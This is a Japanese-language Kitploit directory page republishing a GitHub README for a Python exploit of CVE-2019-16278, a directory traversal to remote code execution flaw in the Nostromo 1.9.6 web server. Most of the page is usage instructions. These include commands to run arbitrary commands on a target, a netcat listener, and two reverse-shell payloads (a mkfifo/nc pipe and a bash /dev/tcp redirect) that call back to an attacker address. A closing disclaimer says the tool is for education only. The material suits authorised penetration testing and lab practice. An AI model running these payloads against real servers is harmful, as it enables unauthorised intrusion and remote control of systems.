Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/cybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubcybermonkx/cve-2019-16278_nostromo-1.9.6---remote-code-execution

CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

認証されていない攻撃者は、URL の検証に失敗するため、サーバーを '/bin/sh' のようなシェルファイルに強制的にポイントさせ、システムに存在する任意のファイルへのパストラバーサルを引き起こして、任意のコマンドを実行できます。1.9.6 などの Nostromo のバージョンはこの URL の検証に失敗します。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1年前未レビュー

POC

リポジトリ: https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git

📜 説明

このリポジトリには、Nostromo 1.9.6(Webサーバー)の脆弱性であるCVE-2019-16278を悪用するPythonエクスプロイトが含まれています。この脆弱性により、ディレクトリトラバーサルを利用して標的システム上で任意のコマンドを実行する**リモートコード実行(RCE)**が可能になります。

🚀 特徴

  • 脆弱な標的上で任意のシェルコマンドを実行。
  • リバースシェルペイロードのサポート。
  • 標的からのレスポンスのサイズをカスタマイズ可能。

🛠️ 要件

  • Python 3.x
  • Nostromo 1.9.6 を実行しているマシン(脆弱な標的)。
  • リバースシェルを受け取るための Netcat(nc)。

⚙️ 使用方法

ステップ 1: リポジトリをクローンする

root@kitploit:~
git clone https://github.com/CybermonkX/CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution.git
cd CVE-2019-16278_Nostromo-1.9.6---Remote-Code-Execution

ステップ 2: エクスプロイトを実行する

root@kitploit:~
python3 CVE-2019-16278.py -t <TARGET_IP> -p <PORT> -c "<COMMAND>" [-b <BYTES_TO_READ>]

引数:

🧑‍💻 使用例

例 1: 標的上で whoami を実行する

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "whoami"

例 2: Netcat を使用したリバースシェル

ステップ 1: 攻撃用マシンでNetcatリスナーを起動する:

root@kitploit:~
nc -lvnp 443

ステップ 2: リバースシェルペイロードを指定してエクスプロイトを実行する:

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.16.5 443 > /tmp/f"

例 3: /dev/tcp を使用したリバースシェル

root@kitploit:~
python3 CVE-2019-16278.py -t 10.10.10.165 -p 80 -c "bash -i >& /dev/tcp/10.10.16.5/443 0>&1"

🔍 脆弱性の詳細

root@kitploit:~
CVE: CVE-2019-16278
影響を受けるソフトウェア: Nostromo 1.9.6 Webサーバー
種類: ディレクトリトラバーサル -> リモートコード実行

⚠️ 免責事項

このツールは教育目的のみを意図しています。所有していない、またはテストする明示的な許可を得ていないシステムでは使用しないでください。システムへの不正アクセスは違法です。責任を持って使用してください。

ツールをダウンロード
引数説明必須デフォルト
-t, --target標的のIPアドレスはいなし
-p, --port標的のポートはいなし
-c, --commandサーバー上で実行するコマンドはいなし
-b, --bytesレスポンスで読み取るバイト数いいえ4096